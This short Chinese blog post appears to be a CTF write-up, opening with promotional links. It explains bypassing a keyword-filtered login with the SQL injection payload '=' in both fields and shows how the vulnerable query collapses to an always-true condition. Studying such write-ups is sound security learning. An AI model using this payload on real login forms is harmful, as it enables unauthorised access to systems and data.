分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow
也欢迎大家转载本篇文章。分享知识,造福人民,实现我们中华民族伟大复兴!
题目想法挺简单的,是时候学习一下注入的套路了,真的要不简单的也想不到。
发现* / select union or 都被过滤了,一开始想的太复杂了,以为是个什么waf过滤什么的,但是看了pcat前辈的WP发现真的很基础吧。
但是and ‘什么的都没有过滤!
payload真的简单到淫荡,看一下就是这样的
admin-> ‘=’
password-> ‘=’
password-> ‘=’
真是醉了,为什么呢,类似这样的语句
$sql = “select user from flag where user=’\$_POST[‘user’]’ and password=’\$_POST[‘password’]’”;
如果我们按照上面输入就成了
$sql = “select user from flag where user=’‘=’’ and password=’‘=’‘”;
user=”返回的是NULL=”也是符合条件的,最后就是
$sql = “select user from flag where 1 and 1”;
还是需要多实验啊~